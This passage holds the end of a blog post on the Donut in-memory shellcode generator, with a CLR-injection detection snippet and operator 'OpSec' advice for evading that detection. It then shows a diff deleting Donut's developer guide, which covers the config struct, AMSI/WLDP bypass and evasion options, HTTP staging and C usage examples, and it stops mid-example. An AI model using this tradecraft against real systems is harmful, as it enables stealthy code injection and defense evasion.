Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
}
}
}
```
![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/detected.png)
It is important to note that this behaviour represents all CLR Injection techniques, of which there are several. This detection should work for donut, as well as other tools such as Cobalt Strike's 'execute-assembly' command.
## OpSec Considerations
ModuleMonitor demonstrates an important point about CLR Injection: When performed against unmanaged processes, CLR Injection produces highly anomalous process behavior. The loading of a CLR after a process's initial execution or from unmanaged code is unusual. There are few legitimate use cases. From a defender's perspective, this allows you to build a analytics that monitor for the behavior described in the section above.
However, as I mentioned, this analytic fails to detect CLR Injection into processes that already have the CLR loaded. As such, an operator could evade the analytic by simply injecting into processes that are already managed. I would recommend the following standard operating procedure:
1. Run ProcessManager from memory to enumerate processes. Take note of which you can inject into.
2. If there are any processes that are already managed, then consider them the set of potential targets.
3. If there are not any managed processes, then all processes are potential targets.
4. Either way, inject / migrate into the process that is most likely to naturally produce network traffic and live the longest.
# Conclusion
Offensive .NET tradecraft is faced with several important challenges. One of them is the lack of means to inject into remote processes at will. While this can normally be performed with shellcode, there is no way to produce shellcode that can run a .NET Assembly directly on hardware. Any shellcode that runs a .NET Assembly must first bootstrap the Common Language Runtime and load the Assembly through it. Enter Donut. With Donut, we now have a framework for generating flexible shellcode that loads a .NET Assembly from memory. This can be combined with existing techniques and tooling to advance tradecraft in a number of ways. Hopefully, this will break down the current barriers in .NET-based exploitation and provide tool designers with a foundation for crafting more excellent tools.
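Review bot: this hunk removes the post's detection and OpSec guidance (the CLR Sentry analytic with its false positive and false negative notes, the module-load pseudocode and C# check, and the note that the same behaviour covers other CLR injection tooling) together with the rest of the file, and nothing in the visible diff relocates that content. If the file is being dropped as part of a cleanup, please say so in the commit description or move the detection section to a docs page rather than deleting it, since this text is also the only pointer readers have to the ModuleMonitor implementation ("The full code can be found in ModuleMonitor"); if ModuleMonitor is being removed as well, a short README note that the write-up has been retired would avoid dangling references.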

View File

@ -1,912 +0,0 @@
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<h2>Table of contents</h2>
<ol>
<li><a href="#intro">Introduction</a></li>
<li><a href="#api">Donut API</a></li>
<li><a href="#config">Donut Configuration</a></li>
<li><a href="#static">Static Example</a></li>
<li><a href="#dynamic">Dynamic Example</a></li>
<li><a href="#com">Donut Components</a></li>
<li><a href="#instance">Donut Instance</a></li>
<li><a href="#module">Donut Module</a></li>
<li><a href="#hashing">Win32 API Hashing</a></li>
<li><a href="#encryption">Symmetric Encryption</a></li>
<li><a href="#bypass">Bypasses for AMSI/WLDP</a></li>
<li><a href="#debug">Debugging The Generator and Loader</a></li>
<li><a href="#loader">Extending The Loader</a></li>
</ol>
<h2 id="intro">1. Introduction</h2>
<p>This document contains information useful to developers that want to integrate Donut into their own project or write their own generator in a different language. Static and dynamic examples in C are provided for Windows and Linux. There's also information about the internals of the generator and loader such as data structures, the hash algorithm for resolving API, how bypassing AMSI and WLDP works, the symmetric encryption, debugging the generator and loader. Finally, there's also some information on how to extend functionality of the loader itself.</p>
<h2 id="api">2. Donut API</h2>
<p>Shared/dynamic and static libraries for both Windows and Linux provide access to three API.</p>
<ol>
<li><code>int DonutCreate(PDONUT_CONFIG)</code></li>
<p>Builds the Donut shellcode/loader using settings stored in a <code>DONUT_CONFIG</code> structure.</p>
<li><code>int DonutDelete(PDONUT_CONFIG)</code></li>
<p>Releases any resources allocated by a successful call to <code>DonutCreate</code>.</p>
<li><code>const char* DonutError(int error)</code></li>
<p>Returns a description for an error code returned by <code>DonutCreate</code>.</p>
</ol>
<p>The Donut project already contains a generator in C. <a href="https://twitter.com/nixbyte">nixbyte</a> has written <a href="https://github.com/n1xbyte/donutCS">a generator in C#</a>. awgh has written <a href="https://github.com/Binject/go-donut/">a generator in Go</a> and <a href="https://twitter.com/byt3bl33d3r">byt3bl33d3r</a> has written a Python module already included with the source.</p>
<h2 id="config">3. Donut Configuration</h2>
<p>The minimum configuration required to build the loader is a path to a VBS/JS/EXE/DLL file that will be executed in-memory. If the file is a .NET DLL, a class and method are required. If the module will be stored on a HTTP server, a URL is required. The following structure is declared in donut.h and should be zero initialized prior to setting any member.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
uint32_t len<span style='color:#808030; '>,</span> zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original length of input file and compressed length</span>
<span style='color:#696969; '>// general / misc options for loader</span>
<span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture</span>
<span style='color:#800000; font-weight:bold; '>int</span> bypass<span style='color:#800080; '>;</span> <span style='color:#696969; '>// bypass option for AMSI/WDLP</span>
<span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine to use when compressing file via RtlCompressBuffer</span>
<span style='color:#800000; font-weight:bold; '>int</span> entropy<span style='color:#800080; '>;</span> <span style='color:#696969; '>// entropy/encryption level</span>
<span style='color:#800000; font-weight:bold; '>int</span> format<span style='color:#800080; '>;</span> <span style='color:#696969; '>// output format for loader</span>
<span style='color:#800000; font-weight:bold; '>int</span> exit_opt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// return to caller or invoke RtlExitUserProcess to terminate the host process</span>
<span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API</span>
uint32_t oep<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original entrypoint of target host file</span>
<span style='color:#696969; '>// files in/out</span>
<span style='color:#800000; font-weight:bold; '>char</span> input<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of input file to read and load in-memory</span>
<span style='color:#800000; font-weight:bold; '>char</span> output<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of output file to save loader</span>
<span style='color:#696969; '>// .NET stuff</span>
<span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use for CLR</span>
<span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for .NET DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class with optional namespace for .NET DLL</span>
<span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method or DLL function to invoke for .NET DLL and unmanaged DLL</span>
<span style='color:#696969; '>// command line for DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line to use for unmanaged DLL/EXE and .NET DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// param is passed to DLL function without converting to unicode</span>
<span style='color:#696969; '>// HTTP/DNS staging information</span>
<span style='color:#800000; font-weight:bold; '>char</span> server<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be stored on remote HTTP server or DNS server</span>
<span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk for http stager</span>
<span style='color:#696969; '>// DONUT_MODULE</span>
<span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// VBS/JS/DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>int</span> mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
DONUT_MODULE <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_MODULE</span>
<span style='color:#696969; '>// DONUT_INSTANCE</span>
<span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP</span>
<span style='color:#800000; font-weight:bold; '>int</span> inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
DONUT_INSTANCE <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_INSTANCE</span>
<span style='color:#696969; '>// shellcode generated from configuration</span>
<span style='color:#800000; font-weight:bold; '>int</span> pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of loader/shellcode</span>
<span style='color:#800000; font-weight:bold; '>void</span><span style='color:#808030; '>*</span> pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to loader/shellcode</span>
<span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
</pre>
<p>The following table provides a description of each member.</p>
<table border="1">
<tr>
<th>Member</th>
<th>Description</th>
</tr>
<tr>
<td><code>len, zlen</code></td>
<td><var>len</var> holds the length of the file to execute in-memory. If compression is used, <var>zlen</var> will hold the length of file compressed.</td>
</tr>
<tr>
<td><code>arch</code></td>
<td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
</tr>
<tr>
<td><code>bypass</code></td>
<td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are <code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. <code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. <code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
</tr>
<tr>
<td><code>compress</code></td>
<td>Indicates if the input file should be compressed. Available engines are <code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports <code>DONUT_COMPRESS_LZNT1</code>, <code>DONUT_COMPRESS_XPRESS</code> and <code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
</tr>
<tr>
<td><code>entropy</code></td>
<td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are <code>DONUT_ENTROPY_NONE</code>, <code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and <code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
</tr>
<tr>
<td><code>format</code></td>
<td>Specifies the output format for the shellcode loader. Supported formats are <code>DONUT_FORMAT_BINARY</code>, <code>DONUT_FORMAT_BASE64</code>, <code>DONUT_FORMAT_RUBY</code>, <code>DONUT_FORMAT_C</code>, <code>DONUT_FORMAT_PYTHON</code>, <code>DONUT_FORMAT_POWERSHELL</code>, <code>DONUT_FORMAT_CSHARP</code> and <code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
</tr>
<tr>
<td><code>exit_opt</code></td>
<td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Set this to <code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.Use 3=<code>DONUT_OPT_EXIT_BLOCK</code> to not exit or cleanup and instead block indefinitely.</td>
</tr>
<tr>
<td><code>thread</code></td>
<td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
</tr>
<tr>
<td><code>oep</code></td>
<td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
</tr>
<tr>
<td><code>input</code></td>
<td>The path of file to execute in-memory. VBS/JS/EXE/DLL files are supported.</td>
</tr>
<tr>
<td><code>output</code></td>
<td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
</tr>
<tr>
<td><code>runtime</code></td>
<td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
</tr>
<tr>
<td><code>domain</code></td>
<td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
</tr>
<tr>
<td><code>cls</code></td>
<td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
</tr>
<tr>
<td><code>method</code></td>
<td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
</tr>
<tr>
<td><code>param</code></td>
<td>String with a list of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
</tr>
<tr>
<td><code>unicode</code></td>
<td>By default, the <code>param</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
</tr>
<tr>
<td><code>server</code></td>
<td>If the instance <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
</tr>
<tr>
<td><code>modname</code></td>
<td>If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
</tr>
<tr>
<td><code>mod_type</code></td>
<td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
</tr>
<tr>
<td><code>mod_len</code></td>
<td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
</tr>
<tr>
<td><code>mod</code></td>
<td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
</tr>
<tr>
<td><code>inst_type</code></td>
<td><code>DONUT_INSTANCE_EMBED</code> indicates a self-contained payload which means the file is embedded. <code>DONUT_INSTANCE_HTTP</code> indicates the file is stored on a remote HTTP server.</td>
</tr>
<tr>
<td><code>inst_len</code></td>
<td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
</tr>
<tr>
<td><code>inst</code></td>
<td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
</tr>
<tr>
<td><code>pic_len</code></td>
<td>The size of data pointed to by <code>pic</code>.</td>
</tr>
<tr>
<td><code>pic</code></td>
<td>Points to the loader/shellcode. This should be injected into a remote process.</td>
</tr>
</table>
<h2 id="static">4. Static Example</h2>
<p>The following is linked with the static library donut.lib on Windows or donut.a on Linux.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
<span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
DONUT_CONFIG c<span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
<span style='color:#603000; '>FILE</span> <span style='color:#808030; '>*</span>out<span style='color:#800080; '>;</span>
<span style='color:#696969; '>// need at least a file</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_static &lt;EXE></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#696969; '>// copy input file</span>
<span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#696969; '>// default settings</span>
c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
<span style='color:#696969; '>// generate the shellcode</span>
err <span style='color:#808030; '>=</span> DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
</pre>
<h2 id="dynamic">5. Dynamic Example</h2>
<p>This example requires access to donut.dll on Windows or donut.so on Linux.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
<span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
DONUT_CONFIG c<span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
<span style='color:#696969; '>// function pointers</span>
DonutCreate_t _DonutCreate<span style='color:#800080; '>;</span>
DonutDelete_t _DonutDelete<span style='color:#800080; '>;</span>
DonutError_t _DonutError<span style='color:#800080; '>;</span>
<span style='color:#696969; '>// need at least a file</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_dynamic &lt;file></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#696969; '>// try load donut.dll or donut.so</span>
<span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>if</span><span style='color:#004a43; '> </span><span style='color:#004a43; '>defined</span><span style='color:#808030; '>(</span><span style='color:#004a43; '>WINDOWS</span><span style='color:#808030; '>)</span>
<span style='color:#603000; '>HMODULE</span> m <span style='color:#808030; '>=</span> <span style='color:#400000; '>LoadLibrary</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.dll</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
_DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> <span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.dll.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>else</span>
<span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>m <span style='color:#808030; '>=</span> dlopen<span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.so</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> RTLD_LAZY<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
_DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
